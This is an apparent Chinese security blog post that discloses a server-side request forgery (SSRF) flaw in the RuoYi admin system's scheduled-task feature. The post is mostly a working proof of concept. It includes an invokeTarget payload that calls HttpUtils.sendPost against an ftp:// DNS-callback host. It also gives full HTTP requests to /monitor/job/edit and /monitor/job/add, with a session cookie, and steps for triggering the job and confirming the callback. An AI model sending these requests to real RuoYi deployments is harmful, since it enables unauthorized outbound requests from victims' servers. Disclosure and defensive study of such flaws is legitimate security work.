查看原文
其他

SpringKill的0day|若依后台定时任务存在SSRF漏洞

春纱 阿呆攻防
2024-10-03



这个漏洞适合广大水洞的安服兄弟们,这个洞是SpringKill为了支援呆哥在项目上有交付,现场翻源码审的,POC很简单附在文中。

SpringKill师傅的Github地址:https://github.com/springkill



 

01

项目介绍


- 项目名称:若依

- 项目地址:

https://gitee.com/y_project/RuoYi

- 项目描述:基于SpringBoot的权限管理系统 易读易懂、界面简洁美观。核心技术采用Spring、MyBatis、Shiro没有任何其它重度依赖。直接运行即可用

 

02

简单分析


https://gitee.com/y_project/RuoYi/blob/master/ruoyi-common/src/main/java/com/ruoyi/common/constant/Constants.java

这是若依黑名单位置:ruoyi-common/src/main/java/com/ruoyi/common/constant/Constants.java。

没加com.ruoyi.common的黑名单限制。


03

复现案例


 POC:

com.ruoyi.common.utils.http.HttpUtils.sendPost('ftp://6a928e83f9.ipv6.1433.eu.org','')

POST /monitor/job/edit HTTP/1.1Host: xxxConnection: keep-aliveContent-Length: 242sec-ch-ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Cookie: JSESSIONID=563ce678-53de-407f-8ed9-cabbc1f17ea4
jobId=102&updateBy=admin&jobName=test&jobGroup=DEFAULT&invokeTarget=com.ruoyi.common.utils.http.HttpUtils.sendPost('ftp%3A%2F%2F6a928e83f9.ipv6.1433.eu.org'%2C'')&cronExpression=0%2F10+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=1&remark=
POST /monitor/job/add HTTP/1.1Host: xxxxConnection: keep-aliveContent-Length: 232sec-ch-ua: "Chromium";v="124", "Google Chrome";v="124", "Not-A.Brand";v="99"Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36Cookie: JSESSIONID=563ce678-53de-407f-8ed9-cabbc1f17ea4

createBy=admin&jobName=test1&jobGroup=DEFAULT&invokeTarget=com.ruoyi.common.utils.http.HttpUtils.sendPost('ftp%3A%2F%2F6a928e83f9.ipv6.1433.eu.org'%2C'')&cronExpression=0%2F1+*+*+*+*+%3F&misfirePolicy=1&concurrent=1&status=0&remark=

点击确认->更多操作->执行一次

点完之后去dnslog那里看就行了,这里执行需要等待5-20秒。

后面执行完毕之后在调度日志也可以看到。

 

04

技术交流




继续滑动看下一个
阿呆攻防
向上滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存